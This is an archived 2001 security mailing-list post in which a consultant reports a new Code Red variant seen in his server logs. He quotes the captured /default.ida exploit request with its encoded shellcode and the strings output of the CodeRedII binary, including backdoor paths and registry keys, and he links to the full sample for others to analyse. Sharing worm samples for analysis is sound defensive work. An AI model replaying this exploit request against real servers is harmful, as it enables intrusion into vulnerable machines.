OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Stephen Friedl (friedlmtndew.com)
Date: Sat Aug 04 2001 - 10:34:49 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello all,

    I'm sorry if this is old news: but is there a new variant going around?
    My logs just started showing entries with the signature

            /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...

    instead of the

            /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...

    that we've been used to. I know there is a CRv2, but I cannot find any
    references to a different signature. I've captured the entire request,
    and though the % code is all the same, the payload is different. This
    is the "strings" output on the binary:

    ----------------------------------------------------------------------
    GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
    Content-type: text/xml
    Content-length: 3379
    CodeRedII
    F4)E
    Th~f
    Th~f
    ;MZu
    KERNu
    EL32u
    GetPu
    rocAu
    D$$dg
    LoadLibraryA
    CreateThread
    GetTickCount
    Sleep
    GetSystemDefaultLangID
    GetSystemDirectoryA
    CopyFileA
    GlobalFindAtomA
    GlobalAddAtomA
    CloseHandle
    _lcreat
    _lwrite
    _lclose
    GetSystemTime
    WS2_32.DLL
    socket
    closesocket
    ioctlsocket
    connect
    select
    send
    recv
    gethostname
    gethostbyname
    WSAGetLastError
    USER32.DLL
    ExitWindowsEx
    \CMD.EXE
    d:\inetpub\scripts\root.exe
    d:\progra~1\common~1\system\MSADC\root.exe
    hT
    hH
    hX
    t6Ff
    %`0
    %d0
    %h0
    %p0
    %t0
    %x0
    %|0
    \EXPLORER.EXE
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    SFCDisable
    SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
    /Scripts
    /MSADC
    c:\,,217
    d:\,,217
    KERNEL32.dll
    ADVAPI32.dll
    Sleep
    GetWindowsDirectoryA
    WinExec
    RegQueryValueExA
    RegSetValueExA
    RegOpenKeyExA
    RegCloseKey
    d:\explorer.exe
    8>u'j
    ----------------------------------------------------------------------

    The 3818 byte capture file is on my web server if anybody wants to poke around:

            http://www.unixwiz.net/misc/codered.bin

    Thanks to dwmorris at DSLReports.com for the heads up on this.

    Steve

    ---
    Stephen J Friedl | Software Consultant | Tustin, CA | +1 714 544-6561
    www.unixwiz.net | I speak for me only | KA8CMY | steveunixwiz.net

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com